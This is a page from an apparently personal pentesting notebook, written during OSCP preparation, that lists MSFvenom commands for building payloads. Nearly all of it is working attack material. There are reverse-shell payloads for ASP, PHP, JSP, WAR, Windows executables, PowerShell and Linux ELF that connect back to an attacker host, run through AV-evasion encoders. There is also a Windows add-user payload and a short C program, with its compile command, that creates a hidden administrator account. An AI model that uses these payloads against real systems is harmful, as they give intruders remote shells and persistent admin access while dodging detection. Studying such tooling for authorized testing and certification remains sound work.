yuyudhn's notes
  • About
  • 🚉QUICKSTART
    • Prerequisite
    • Reconnaissance
    • Exploitation
    • Post Exploitation
    • ⛈️Misc
  • 🪟Active Directory
    • Basic Command
    • Enumeration
      • PowerView
    • Service Exploitation
      • LDAP
      • SMB
        • MS17-010
      • MSSQL
    • Privilege Escalation
      • Unquoted Service Path
      • UAC Bypass
      • Token Abuse
    • Post Exploitation
      • Tunneling with Ligolo-ng
    • Credential Hunting
      • Group Policy Preferences
      • DPAPI
  • MITRE ATT&CK
    • Defense Evasion
      • Physical Attack: Remove EDR
      • AMSI Bypass
    • Credential Access
      • Dump SAM Hashes via Registry
  • 🐧Linux
    • Misc
    • Linux Post Exploitation
    • Linux Password Hunting
  • 🐚Backdoor Stuff
    • Simple PHP Webshell
    • MSFvenom Generate Payload
  • 📳Mobile Pentest: iOS
    • iOS Penetration Testing
    • Objection
  • 🕸️Web Application
    • Common Applications
      • Tomcat
      • Joomla
    • SSTI
    • File Inclusion
    • XSS
    • Misc
  • 🖊️Machine Writeup
    • HackTheBox
      • Perfection
      • Pilgrimage
      • PC
      • Shoppy
      • GoodGames
      • Photobomb
      • Support
Powered by GitBook
On this page
  • Listing Available Options
  • Web Based Payload
  • Windows
  • Linux
  • Add Windows User

Was this helpful?

  1. Backdoor Stuff

MSFvenom Generate Payload

Generate payload with MSFvenom

Listing Available Options

msfvenom -l payloads # Payloads
msfvenom -l encoders # Encoders
msfvenom -l platforms # Platforms
msfvenom -l formats # Formats

Note: I created this page during my OSCP preparation. All payloads here are for gaining a reverse shell through Netcat, as Metasploit (or Meterpreter) is prohibited.

Web Based Payload

ASP Payload

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=1337 -f asp > asuka.asp

PHP Payload

msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php
echo "<?php" | cat - shell.php > temp && mv temp shell.php

JSP Payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=31337 -f raw > shell.jsp

WAR Payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=31337 -f war > shell.war

Windows

Create User

msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe -o adduser.exe

Execute Command

# x86
msfvenom -a x86 -p windows/exec CMD="calc.exe" -e x86/shikata_ga_nai -f exe -o payload.exe
# x64
msfvenom -p windows/x64/exec CMD="calc.exe" -f exe -e x64/xor_dynamic -o payload-x64.exe

Reverse Shell

# x86
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=4443 -f exe -e x86/shikata_ga_nai -o reverse86.exe
# x64
msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4443 -f exe -e x64/xor_dynamic -o reverse64.exe

PowerShell

msfvenom -p windows/x64/shell_reverse_tcp LHOST=wlan0 LPORT=31337 -f psh -e x64/xor_dynamic -o rev.ps1

Linux

# x86
msfvenom  -p linux/x86/shell_reverse_tcp LHOST=tun0 LPORT=1337 -e x86/shikata_ga_nai -f elf -o asuka-x86.elf
# x64
msfvenom -a x64 -p linux -p linux/x64/shell_reverse_tcp LHOST=tun0 LPORT=1337 -e x64/xor_dynamic -f elf -o asuka-64.elf

Add Windows User

adduser.c

#include <stdlib.h>

int main ()
{
	int i;
	i = system ("net user admoon Linuxsec#1337 /add");
	i = system ("net localgroup administrators admoon /add");

		return 0;
}

Compile:

x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
PreviousSimple PHP WebshellNextiOS Penetration Testing

Last updated 6 months ago

Was this helpful?

🐚